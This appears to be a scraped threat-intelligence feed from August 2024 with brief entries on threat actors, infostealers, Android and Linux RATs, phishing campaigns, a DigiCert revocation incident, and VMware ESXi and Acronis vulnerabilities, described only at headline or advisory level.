GROUPThe threat actor dubbed UNC4393 has been active in the threat landscape since at least 2022. The group has been known to leverage a wide variety of malware variants and custom tools in their attacks including Basta ransomware, KnotWrap dropper, KnotRock tool, DawnCry dropper or the PortYard tunneler.

2.8.24

Exela Stealer continues to be distributed in the wild

ALERTS

VIRUSExela Stealer is a Python-based malware initially discovered in the threat landscape just last year. New campaigns distributing this infostealer continue to be observed in the wild in recent weeks.

2.8.24

Flame Stealer malware

ALERTS

VIRUSFlame Stealer is a new C/C++based infostealing malware variant advertised for sale on Discord and Telegram. The malware has the functionality to collect and exfiltrate various information about the infected machine, Discord tokens, clipboard data, credentials, banking information and browser cookies, among others.

2.8.24

Sitting DucksATTACKDomainResearchers at Infoblox and Eclypsium have discovered that a powerful attack vector in the domain name system (DNS) is being widely exploited across many DNS providers.

2.8.24

BingoModMALWARERATBingoMod: The new android RAT that steals money and wipes data

2.8.24

ERIAKOSCAMPAIGNScam"ERIAKOS" Scam Campaign: Detected by Recorded Future’s Payment Fraud Intelligence Team

2.8.24

DigiCert Revocation Incident

INCIDENT

Certification

DigiCert Revocation Incident (CNAME-Based Domain Validation)

2.8.24

DEV#POPPER campaign

CAMPAIGN

CAMPAIGN

The Securonix Threat Research team has been monitoring the threat actors behind the ongoing investigation into the DEV#POPPER campaign, we have identified additional malware variants linked to the same North Korean threat actors using similar, stealthy malicious code execution tactics, though now with much more robust capabilities.

2.8.24

Cuckoo Spear

GROUP

GROUP

Cuckoo Spear – the latest Nation-state Threat Actor targeting Japanese companies

2.8.24

Linux.BackDoor.TgRat.2

MALWARE

RAT

A trojan for Linux with a wide range of functions and the ability to be remotely controlled via a Telegram bot. The source code is written in Go and encrypted with RSA.

2.8.24

TgRAT

MALWARE

RAT

At the first stage, the dropper checks the parameters (arguments) used for its launch: this impacts the intermediate persistence stage. If there are input arguments, the add_payload stage begins (named after the function that performs it).

2.8.24

SMS Stealer

MALWARE

SMS

Unmasking the SMS Stealer: Targeting Several Countries with Deceptive Apps

2.8.24

Turla

APT

APT

Turla: A Master’s Art of Evasion

2.8.24

Mandrake

MALWARE

Spyware

Mandrake spyware sneaks onto Google Play again, flying under the radar for two years

2.8.24

ModiLoader

MALWARE

Loader

Phishing targeting Polish SMBs continues via ModiLoader

2.8.24

OneDrive Pastejacking

CAMPAIGN

PHISHING

OneDrive Pastejacking: The crafty phishing and downloader campaign

2.8.24

OneDrive Pastejacking

PHISHING

PHISHING

OneDrive Pastejacking: The crafty phishing and downloader campaign

2.8.24

CVE-2024-37085

VULNEREBILITY

CVE

VMware ESXi contains an authentication bypass vulnerability. A malicious actor with sufficient Active Directory (AD) permissions can gain full access to an ESXi host that was previously configured to use AD for user management https://blogs.vmware.com/vsphere/2012/09/joining-vsphere-hosts-to-active-directory.html by re-creating the configured AD group ('ESXi Admins' by default) after it was deleted from AD.

2.8.24

CVE-2023-45249

VULNEREBILITY

CVE

Remote command execution due to use of default passwords. The following products are affected: Acronis Cyber Infrastructure (ACI) before build 5.0.1-61, Acronis Cyber Infrastructure (ACI) before build 5.1.1-71, Acronis Cyber Infrastructure (ACI) before build 5.2.1-69, Acronis Cyber Infrastructure (ACI) before build 5.3.1-53, Acronis Cyber Infrastructure (ACI) before build 5.4.4-132.